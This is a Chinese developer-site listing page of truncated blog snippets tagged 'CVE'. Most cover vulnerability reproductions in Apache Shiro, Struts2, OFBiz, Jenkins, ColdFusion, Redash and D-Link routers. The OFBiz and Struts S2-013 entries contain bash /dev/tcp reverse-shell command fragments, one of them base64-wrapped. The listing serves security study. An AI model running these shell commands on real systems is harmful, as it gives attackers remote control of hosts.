E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
CVE
CVPR 2021 | AttentiveNAS:通过注意力采样改善神经架构搜索
点击下方卡片,关注“
CVe
r”公众号AI/CV重磅干货,第一时间送达本文转载自:AI异构AttentiveNAS:通过注意力采样改善神经架构搜索本文是Facebook发表在CVPR2021的NAS论文。
Amusi(CVer)
·
2024-01-29 10:29
算法
python
计算机视觉
神经网络
机器学习
v8漏洞任意地址读写(
CVE
-2021-21220)
V8版本:9.2.0commit:1e4b1c521a491c7487028b7f2aec550c1b36606b漏洞文件:instruction-selector-x64.cc漏洞函数:InstructionSelector::VisitChangeInt32ToInt64补丁信息:https://chromium-review.googlesource.com/c/v8/v8/+/282097
钞sir
·
2024-01-29 10:21
V8
javascript
安全
汇编
服务攻防-开发组件安全&Jackson&FastJson各版本&XStream&
CVE
环境复现
知识点1、J2EE-组件Jackson-本地demo&
CVE
(数据处理)2、J2EE-组件FastJson-本地demo&
CVE
(数据处理)3、J2EE-组件XStream-本地demo&
CVE
(数据处理
SuperherRo
·
2024-01-29 08:35
#
服务安全篇
安全
fastjson
xstream
jackson
内网安全:Exchange服务
探针一.端口扫描二.SPN扫描三.脚本探针(还可以探针是否有安全漏洞)域横向移动-内网服务-Exchange爆破一.BurpSuiteIntruder模块爆破域横向移动-内网服务-Exchange漏洞
CVE
貌美不及玲珑心,贤妻扶我青云志
·
2024-01-29 06:25
内网渗透
安全
2022-03-10新的Satori 僵尸网络变种奴役了数千台 Dasan WiFi 路由器
进一步调查发现了Satori僵尸网络的新变种,能够主动扫描和利用
CVE
-2017-18046-Dasan未经身份验证的远程执行代码。被称为“Satori.Dasan”,以高成功率迅速扩张。
Eliza_卓云
·
2024-01-29 06:54
企语iFair协同管理系统getuploadimage.jsp接口存在任意文件读取漏洞
CVE
-2023-47473
@[toc]企语iFair协同管理系统getuploadimage.jsp接口存在任意文件读取漏洞
CVE
-2023-47473免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失
sublime88
·
2024-01-28 21:42
漏洞复现
安全
web安全
网络安全
网络
UNITY之CharacterController
//Demo01usingUnityEngine;usingSystem.Collections;publicclassCharacterCtr:MonoBehaviour{publi
cVe
ctor3targetPos
csdnXiaoYang
·
2024-01-28 15:15
墨者学院-Apache Struts2远程代码执行漏洞(S2-013)复现
靶场地址:https://www.mozhe.cn/bug/detail/S0NiS2JMeTZUTVg3RXdMYzdqWTBQUT09bW96aGUmozhe漏洞编号:
CVE
-2013-1966影响范围
nohands_noob
·
2024-01-28 15:08
superset未授权访问漏洞(
CVE
-2023-27524)复现
Superset是一个开源的数据探索和可视化平台。它由Apache软件基金会支持,旨在帮助用户通过直观的方式探索、分析和可视化复杂的数据集。Superset支持多种数据源,包括关系型数据库、NoSQL数据库和各种其他数据存储系统。ApacheSuperset2.0.1版本及之前版本存在安全漏洞。攻击者利用该漏洞验证和访问未经授权的资源。1.漏洞级别高危2.漏洞搜索fofatitle="Supers
fly夏天
·
2024-01-28 14:08
漏洞复现
安全漏洞
漏洞复现
superset
Redash 默认key漏洞(
CVE
-2021-41192)复现
Redash是以色列Redash公司的一套数据整合分析解决方案。该产品支持数据整合、数据可视化、查询编辑和数据共享等。Redash10.0.0及之前版本存在安全漏洞,攻击者可利用该漏洞来使用已知的默认值伪造会话。1.漏洞级别中危2.漏洞搜索fofa"redash"3.影响范围Redash<10.0.04.漏洞复现漏洞的产生主要原因是由于redash这个项目的token生成方式存在默认key,如果用
fly夏天
·
2024-01-28 14:08
漏洞复现
漏洞复现
CVE-2021-41192
redash
web安全
Apache OFBiz groovy 远程代码执行漏洞(
CVE
-2023-51467)复现
ApacheOFBizgroovy远程代码执行漏洞,攻击者可构造请求绕过身份认证,利用后台相关接口功能执行groovy代码,导致远程代码执行。1.漏洞级别高危2.漏洞搜索fofaapp="Apache_OFBiz"3.影响范围ApacheOFBiz&/dev/tcp/ip/port0>&1注:反弹shell很可能会触发安全机制导致反弹失败。
fly夏天
·
2024-01-28 14:38
漏洞复现
apache
漏洞复现
安全漏洞
OFBiz
RCE
漏洞复现 - Apache Shiro 1.2.4反序列化漏洞(
CVE
-2016-4437)
漏洞原理ApacheShiro是Java的一个安全框架,可以帮助我们完成:认证、授权、加密、会话管理、与Web集成、缓存等功能,应用十分广泛。Shiro最有名的漏洞就是反序列化漏洞了,加密的用户信息序列化后存储在名为remember-me的Cookie中,攻击者使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。这里最关键的切入点就是默认密钥了,这
Sally__Zhang
·
2024-01-28 13:15
Web安全
漏洞复现
web安全
Apache Shiro 1.2.4反序列化漏洞(
CVE
-2016-4437)
目录ApacheShiro简介漏洞原理影响版本漏洞复现声明:本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,本人不承担任何法律及连带责任。ApacheShiro简介ApacheShiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。漏洞原理ApacheShiro框架提供了记住我(rememberMe)的功能,关闭了浏览器下次再打开时还
Passer798
·
2024-01-28 13:14
漏洞复现
apache
java
服务器
shiro1.2.4反序列化漏洞(
CVE
-2016-4437)的问题分析(一)
问题背景:在某个项目中依赖了shiro1.2.4,结果收到了网警的一纸警告,警告上明确写道存在
CVE
-2016-4437以及造成此漏洞的罪魁祸首是使用了org.apache.maven.pluginsmaven-toolchains-plugin1.11.6suntoolchain
donggongai
·
2024-01-28 13:43
java
开发语言
安全
Apache Shiro <= 1.2.4反序列化漏洞攻击
CVE
-2016-4437 已亲自复现
ApacheShiro<=1.2.4反序列化漏洞攻击
CVE
-2016-4437已亲自复现漏洞名称漏洞描述影响版本漏洞复现环境搭建漏洞利用修复建议总结漏洞名称漏洞描述在1.2.5之前的ApacheShiro
Bolgzhang
·
2024-01-28 13:41
apache漏洞合集-亲测
apache
网络安全
不亚于WannaCry:微软面向Windows XP发布紧急修复补丁
图片发自App根据编号为
CVE
-2019-0708的安全公告,
ClassmateCai
·
2024-01-28 10:50
Adobe ColdFusion 任意文件读取漏洞复现(
CVE
-2023-26361)
0x01产品简介AdobeColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。0x02漏洞概述AdobeColdFusion平台filemanager.cfc接口存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。0x03影响范围AdobeColdFu
OidBoy_G
·
2024-01-28 09:03
漏洞复现
adobe
安全
web安全
Adobe ColdFusion 反序列化漏洞复现(
CVE
-2023-38203)
0x01产品简介AdobeColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。0x02漏洞概述AdobeColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。0x03影响范围ColdFusion2018<=Update17ColdFusion202
OidBoy_G
·
2024-01-28 09:57
漏洞复现
adobe
安全
web安全
【
CVE
-2019-16920】多款D-Link路由器的未授权RCE漏洞复现
目录0x00漏洞概述0x01影响版本0x02漏洞评级0x03shodan搜索漏洞环境0x04漏洞验证0x05修复建议0x00漏洞概述友讯科技股份有限公司(D-LinkCorporation)是一家台湾科技公司,总部位于台北市内湖区,于1986年由高次轩成立。公司专注于电脑网络设备的设计开发,自创“D-Link”品牌,主要生产制造消费者及企业所使用的无线网络和以太网硬件产品。2019年9月,Fort
Jaoing
·
2024-01-28 06:53
漏洞复现
缓解Spring Core的“Spring4Shell”零日漏洞
共有两个与Spring产品有关的独立漏洞:
CVE
-2022-2
Akamai中国
·
2024-01-27 23:37
云安全
spring
java
后端
安全
Akamai
Linode
web安全
服务攻防-开发组件安全&Solr搜索&Shiro身份&Log4j日志&本地
CVE
环境复现
J2EE-组件安全-Solr-全文搜索2、J2EE-组件安全-Shiro-身份验证3、J2EE-组件安全-Log4J-日志记录章节点:1、目标判断-端口扫描&组合判断&信息来源2、安全问题-配置不当&
CVE
SuperherRo
·
2024-01-27 22:49
#
服务安全篇
安全
solr
log4j
shiro
CVE
服务攻防-开发框架安全&SpringBoot&Struts2&Laravel&ThinkPHP&
CVE
复现
知识点:1、PHP-框架安全-Thinkphp&Laravel2、J2EE-框架安全-SpringBoot&Struts2章节点:1、目标判断-端口扫描&组合判断&信息来源2、安全问题-配置不当&
CVE
SuperherRo
·
2024-01-27 22:48
#
服务安全篇
安全
spring
boot
struts
thinkphp
laravel
服务攻防-中间件安全&HW2023-WPS分析&Weblogic&Jetty&Jenkins&
CVE
知识点:1、中间件-Jetty-
CVE
&信息泄漏2、中间件-Jenkins-
CVE
&RCE执行3、中间件-Weblogic-
CVE
&反序列化&RCE4、应用WPS-HW2023-RCE&复现&上线CS章节点
SuperherRo
·
2024-01-27 22:46
#
服务安全篇
中间件
wps
Jetty
Jenkins
weblogic
机器人顶会RSS各大奖项出炉!CMU华人博士生荣获最佳论文!
点击下方卡片,关注“
CVe
r”公众号AI/CV重磅干货,第一时间送达本文转载自:机器之心近日,机器人领域知名会议RSS(Robotics:ScienceandSystem)公布了今年的最佳论文、最佳学生论文
Amusi(CVer)
·
2024-01-27 19:33
算法
计算机视觉
机器学习
人工智能
深度学习
查看linux的版本指令
localhost~]#cat/proc/versionLinuxversion2.6.18-194.8.1.el5.centos.plus(mockbuild@builder17.centos.org)(gc
cve
rs
rabbit0708
·
2024-01-27 16:27
多线程
threadLocal
java
数据库架构
The function is not implemented. Rebuild the library with Windows, GTK+ 2.x or Carbon support.
/DisplayImagelena.jpg出现以下问题:Open
CVE
rror:Unspecifiederror(Thefunctionisnotimplemented.RebuildthelibrarywithWindows
晴小鲸
·
2024-01-27 13:24
opencv
ubuntu14.04
opencv3
libgtk2.0-dev
pkg-config
DisplayImage
lena
Jenkins CLI 任意文件读取漏洞复现(
CVE
-2024-23897)
0x01产品简介Jenkins是一个开源的自动化服务器软件,用于构建、测试和部署软件项目。它提供了一种强大的方式来自动化软件开发和交付流程,以提高开发团队的效率和生产力。0x02漏洞概述漏洞成因命令行接口文件读取:Jenkins内置的命令行接口(CLI)存在一个特性,允许在命令参数中用@字符后跟文件路径来替换为文件内容。这导致攻击者能够读取Jenkins控制器文件系统上的任意文件。权限绕过:拥有O
OidBoy_G
·
2024-01-27 11:37
漏洞复现
jenkins
web安全
安全
CVE
-2024-23897 Jenkins 任意文件读取漏洞
项目介绍Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。Jenkins是开源CI&CD软件领导者,提供超过1000个插件来支持构建、部署、自动化,满足任何项目的需要。项目地址https://www.jenkins.io/zh/漏洞概述Jenkins有一个内置的命令行界面CLI,在处理CLI命
棱镜七彩
·
2024-01-27 11:33
jenkins
servlet
运维
Oracle数据库的常见漏洞及注入语句
以下是这8个安全漏洞:1.
CVE
-2021-2018该漏洞无需身份验证即可远程利用,入侵者可以通过网络利用这些漏洞并且不需要用户凭据。给出的安全系数风险评分是8.3分。不过,此攻击复杂度较高,也只影
xiao飞仔
·
2024-01-27 11:04
sql
oracle
数据库
图像与二进制数据间的转换
Python资料:python图片和二进制转换的三种方式_脸不大的
CVe
r的博客-CSDN博客_python二进制转图片环境:python3.8–OpenCV图像(numpy数组)与二进制转换importcv2importnumpyasnp
勤奋的学渣
·
2024-01-27 10:00
算法代码块
算法
python
c++
linux 查看zookeeper server运行版本号
:Zookeeperversion:3.4.5-cdh6.3.2--1,builton11/08/201913:15GMTClients:/127.0.0.1:44814[0](queued=0,re
cve
d
qq_21480329
·
2024-01-27 08:25
zookeeper
day33WEB 攻防-通用漏洞&文件上传&中间件解析漏洞&编辑器安全
目录一,中间件文件解析漏洞-IIS&Apache&Nginx-IIS67文件名目录名-Apache换行解析配置不当1、换行解析-
CVE
-2017-157152、配置不当-.htaccess配置不当-Nginx
aozhan001
·
2024-01-27 01:40
中间件
安全
WordPress wp-file-manager 文件上传漏洞
CVE
-2020-25213
1.漏洞复现WordPress6.2插件:wp-file-manager6.0,FileManager(advancedview)–WordPressplugin|WordPress.org(https://wordpress.org/plugins/wp-file-manager/advanced/)复现后台,安装、启动插件前台,提交请求包:POST /wp-content/plugins/wp
网安Dokii
·
2024-01-26 23:22
android
安全
网络安全
docker mysql8.0.26 迁移 mysql8.3.0
背景mysql8.0.26存在
CVE
-2021-3711、
CVE
-2022-32221漏洞,姑升级到mysql8.3.0镜像准备sudodockersave-omysql830.tarmysql:8.3.0sudodockerload-imysql830
appearappear
·
2024-01-26 23:04
docker
容器
运维
CVE
-2023-48795漏洞修复方法
该漏洞名为TerrapinAttack,编号为(
CVE
-2023-48795,CVSS评分:5.9),该漏洞被描述为“有史以来第一个实际可利用的前缀截断攻击”。
明明跟你说过
·
2024-01-26 21:15
漏洞修复
linux
ssh
运维
如何使用 WebRTC 与 Kurento 建立视频会议 App
本文作者WebRT
CVe
ntures工程师。在RTC2018实时互联网大会上,WebRT
CVe
ntures的资深软件工程师,将围绕WebRTC开发带来经验分享。
老张音视频开发进阶
·
2024-01-26 19:19
webrtc
CVE
-2016-2183漏洞复现
CVE
-2016-2183是OpenSSL库中的一个漏洞,它影响了所有版本的OpenSSL1.0.2之前,包括1.0.1和1.0.0版本。
网络战争
·
2024-01-26 17:51
网络安全
log4j
Google Chrome RCE漏洞
CVE
-2020-6507 和
CVE
-2024-0517的简单分析
本文深入研究了两个在GoogleChrome的V8JavaScript引擎中发现的漏洞,分别是
CVE
-2020-6507和
CVE
-2024-0517。
Fer_David
·
2024-01-26 12:26
红队战术
漏洞分析
chrome
前端
网络安全
安全威胁分析
CVE
-2019-0232:Apache Tomcat RCE复现
漏洞影响范围ApacheTomcat9.0.0.M1to9.0.17ApacheTomcat8.5.0to8.5.39ApacheTomcat7.0.0to7.0.93利用前提Windows系统启用CGIServlet和enableCmdLineArguments参数privileged="true"复现过程配置java环境变量下载相应版本tomcat服务器(此处为9.0.13版本)下载地址打开配
jun123123
·
2024-01-26 10:17
网格切割(MeshCut)
现在粘贴有意的代码块:publicclassMeshExample:MonoBehaviour{//必要的属性:顶点、三角形索引publi
cVe
ctor3[]newVertices;publi
cVe
ctor2
Qkuang
·
2024-01-25 17:40
CVE
-2018-8715 AppWeb认证绕过漏洞【复现】
AppWeb认证绕过漏洞(
CVE
-2018-8715)AppWeb是EmbedthisSoftwareLLC公司负责开发维护的一个基于GPL开源协议的嵌入式WebServer。
TyrantKKK
·
2024-01-25 13:38
redis漏洞研究
今天的计划是修复线上的redis漏洞Redis整形溢出漏洞(
CVE
-2021-32761)及修复脚本目的:修复生产的redis漏洞,主要是整数溢出漏洞,但是过程中发现还有反弹shell漏洞(次要,毕竟需要密码
张dozen
·
2024-01-25 11:56
后端
ATF(TF-A)安全通告TF-V11——恶意的SDEI SMC可能导致越界内存读取(
CVE
-2023-49100)
目录一、ATF(TF-A)安全通告TFV-11(
CVE
-2023-49100)二、透过事务看本质SDEI是干啥的呢?
卢鸿波
·
2024-01-25 08:02
博客目录导读
ATF
TF-A
安全通告
CVE
SMC
SDEI
越界内存访问
Monitorr 任意文件上传漏洞复现(
CVE
-2024-0713)
0x01产品简介Monitorr是一个实时显示任何网络应用程序或服务状态的网络前端。0x02漏洞概述Monitorr1.7.6m版本中发现漏洞。它已被宣布为关键。受此漏洞影响的是组件服务配置的文件/assets/php/upload.php的未知功能。对参数fileToUpload的操作会导致不受限制的上传,未经身份验证的攻击者可远程上传恶意文件导致服务器失陷。0x03复现环境FOFA:body=
OidBoy_G
·
2024-01-25 06:01
漏洞复现
web安全
安全
Atlassian Confluence Data Center and Server 权限提升漏洞复现(
CVE
-2023-22515)
0x01产品简介AtlassianConfluence是一款由Atlassian开发的企业团队协作和知识管理软件,提供了一个集中化的平台,用于创建、组织和共享团队的文档、知识库、项目计划和协作内容。是面向大型企业和组织的高可用性、可扩展性和高性能版本。0x02漏洞概述AtlassianConfluenceDataCenterandServer存在权限提升漏洞,未经身份验证的远程攻击者可以利用该漏洞
OidBoy_G
·
2024-01-25 06:30
漏洞复现
atlassian
安全
web安全
[漏洞复现]Apache Struts2/S2-015 (
CVE
-2013-2134)
一、漏洞情况分析2.3.14.3之前的ApacheStruts2允许远程攻击者通过带有在通配符匹配期间未正确处理的精心制作的操作名称的请求执行任意OGNL代码,这是与
CVE
-2013-2135不同的漏洞
free key
·
2024-01-25 06:41
漏洞复现
春秋云境靶场
Struts
apache
struts
web安全
安全
[漏洞复现]Apache POI < 3.10.1 XXE(
CVE
-2014-3529)
一、漏洞情况分析ApachePOI3.10.1之前的OPCSAX设置允许远程攻击者通过OpenXML文件读取任意文件,该文件包含与XML外部实体(XXE)问题相关的XML外部实体声明和实体引用。二、漏洞复现春秋云境.com进入靶场准备文件和环境创建一个[Content_Types].xml文件和xxe.dtd文件注意名字不可修改###xxe.dtd###">%all;###[Content_Typ
free key
·
2024-01-25 06:10
漏洞复现
春秋云境靶场
web安全
apache
安全
[漏洞复现]Apache Struts2/S2-013 (
CVE
-2013-1966)
一、漏洞情况分析2.3.14.2之前的ApacheStruts2允许远程攻击者通过在(1)URL或(2)A标签中使用includeParams属性时未正确处理的特制请求执行任意OGNL代码。二、漏洞复现春秋云境.com进入靶场开始复现bash-i>&/dev/tcp/127.0.0.1/99990>&1base加密bash-c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOT
free key
·
2024-01-25 06:10
漏洞复现
春秋云境靶场
Struts
apache
struts
java
web安全
安全
[漏洞复现] Craft (
CVE
-2023-41892)
前言本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!一、漏洞情况分析CraftCMS是美国Pixel&tonic公司的一套内容管理系统(CMS)。一个开源的内容管理系统,它专注于用户友好的内容创建过程,逻辑清晰明了,是一个高度自由,高度自定义设计的平台吗,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。Pixel&tonicCraftCMS4.4.15之前版本存在代码
free key
·
2024-01-25 06:10
漏洞复现
安全
web安全
[漏洞复现]Apache Shiro < 1.6.0 验证绕过漏洞(
CVE
-2020-13933)
一、漏洞情况分析ApahceShiro由于处理身份验证请求时出错存在权限绕过漏洞,远程攻击者可以发送特制的HTTP请求,绕过身份验证过程并获得对应用程序的未授权访问。二、漏洞复现春秋云境.com进入靶场开始复现/admin/%3b三、漏洞处置建议把靶场关了,跟漏洞说“白白吧”
free key
·
2024-01-25 06:10
春秋云境靶场
漏洞复现
安全
网络
web安全
上一页
3
4
5
6
7
8
9
10
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他